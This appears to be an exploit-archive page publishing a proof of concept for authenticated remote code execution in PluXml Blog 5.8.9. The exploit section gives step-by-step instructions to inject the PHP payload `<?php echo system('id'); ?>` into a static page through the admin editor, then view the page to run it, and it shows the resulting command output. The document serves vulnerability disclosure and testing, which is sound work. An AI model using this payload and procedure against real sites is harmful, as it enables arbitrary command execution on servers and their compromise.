PluXml Blog 5.8.9 Remote Code Execution

PluXml Blog 5.8.9 Remote Code Execution: Posted Jan 8, 2024; Authored by tmrswrr; PluXml Blog version 5.8.9 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 089ea668c2f217558b9875c3c05adffe8da189418cd26fab4602482252ee201a; Download | Favorite | View

PluXml Blog 5.8.9 Remote Code Execution

## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)
### Date: 2024-1-7
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://pluxml.org/
### Version : 5.8.9
### Tested on: https://www.softaculous.com/apps/cms/PluXml

1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001

    Payload : <?php echo system('id'); ?>

2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1

    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

Top Authors In Last 30 Days

Red Hat 287 files
Ubuntu 61 files
Gentoo 32 files
Debian 24 files
Apple 9 files
malvuln 6 files
nu11secur1ty 6 files
Google Security Research 5 files
Jann Horn 5 files
h00die 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,646)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,788)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,508)
UNIX (9,402)
UnixWare (187)
Windows (6,660)
Other

PluXml Blog 5.8.9 Remote Code Execution

PluXml Blog 5.8.9 Remote Code Execution

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PluXml Blog 5.8.9 Remote Code Execution

Share This

PluXml Blog 5.8.9 Remote Code Execution

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems